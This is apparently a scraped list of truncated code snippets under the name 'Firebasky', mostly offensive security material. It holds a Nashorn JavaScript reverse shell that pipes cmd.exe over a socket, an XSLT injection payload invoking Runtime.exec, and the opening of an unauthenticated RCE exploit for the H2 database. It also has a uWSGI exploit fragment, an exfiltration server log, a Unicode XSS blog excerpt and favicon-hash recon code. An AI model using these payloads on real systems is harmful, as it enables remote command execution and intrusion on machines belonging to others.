Firebasky

import tiktoken
import langdetect
T = tiktoken.get_encoding("o200k_base")

length_dict = {}

for i in range(T.n_vocab):
    try:
        length_dict[i] = len(T.decode([i]))
    except:

Firebasky

#!/usr/bin/env python3
# Author: Sean Pesce

# References:
#   https://stackoverflow.com/questions/19705785/python-3-simple-https-server
#   https://docs.python.org/3/library/ssl.html
#   https://docs.python.org/3/library/http.server.html

# Shell command to create a self-signed TLS certificate and private key:
#    openssl req -new -newkey rsa:4096 -x509 -sha256 -days 365 -nodes -out cert.crt -keyout private.key

Firebasky

Unicode XSS via Combining Characters

Most application security practitioners are familiar with Unicode XSS, which typically arises from the Unicode character fullwidth-less-than-sign. It’s not a common vulnerability but does occasionally appear in applications that otherwise have good XSS protection. In this blog I describe another variant of Unicode XSS that I have identified, using combining characters. I’ve not observed this in the wild, so it’s primarily of theoretical concern. But the scenario is not entirely implausible and I’ve not otherwise seen this technique discussed, so I hope this is useful.

Recap of Unicode XSS

Lab: https://4t64ubva.xssy.uk/

A quick investigation of the lab shows that it is echoing the name parameter, and performing HTML escaping:

Firebasky

[+] Server is listening on 5001
...pre-payoad: 
...post-payoad: 
...pre-payoad: d
...post-payoad: 3
...pre-payoad: d3
...post-payoad: d3
...pre-payoad: d3a
...post-payoad: 0d3
...pre-payoad: d3ad

Firebasky

var host="localhost";
var port=8044;
var cmd="cmd.exe";
var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();

Firebasky

#-*-codeing = utf-8 -*-
#uWSGI 1.9及以上（最新2.0.15，报告官方之后，官方在3.0开发版中修复了这个问题，不受到影响）
import socket
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ports = [8000, 8080, 8181, 9000]
Ip = ['']
info = ""
for port in ports:
    try:
        c.connect((Ip[0], port))

Firebasky

import requests
import time
import ddddocr
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium import webdriver
chrome_options = Options()
chrome_options.add_argument('--headless')
chrome_options.add_argument('--disable-gpu')
driver = webdriver.Chrome(options=chrome_options)

Firebasky

#!/usr/bin/env python


'''
Exploit Title: Unauthenticated RCE
Date: 2018/09/24
Exploit Author: h4ckNinja
Vendor: http://www.h2database.com/
Version: all versions
Tested on: Linux, Mac

Firebasky

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template>
	<!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; -->
	<!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; -->
	<!-- #114 Utf8: open -a calculator -->
	<!-- #115 String: touch /tmp/pwn -->
	<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/>
	<xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/>
	<!-- #132 Utf8: <init> -->
	<AAA select="&lt;init&gt;"/>

Firebasky

# https://twitter.com/brsn76945860/status/1171233054951501824
pip install mmh3

-----------------------------
# python 2
import mmh3
import requests
 
response = requests.get('https://cybersecurity.wtf/favicon.ico')
favicon = response.content.encode('base64')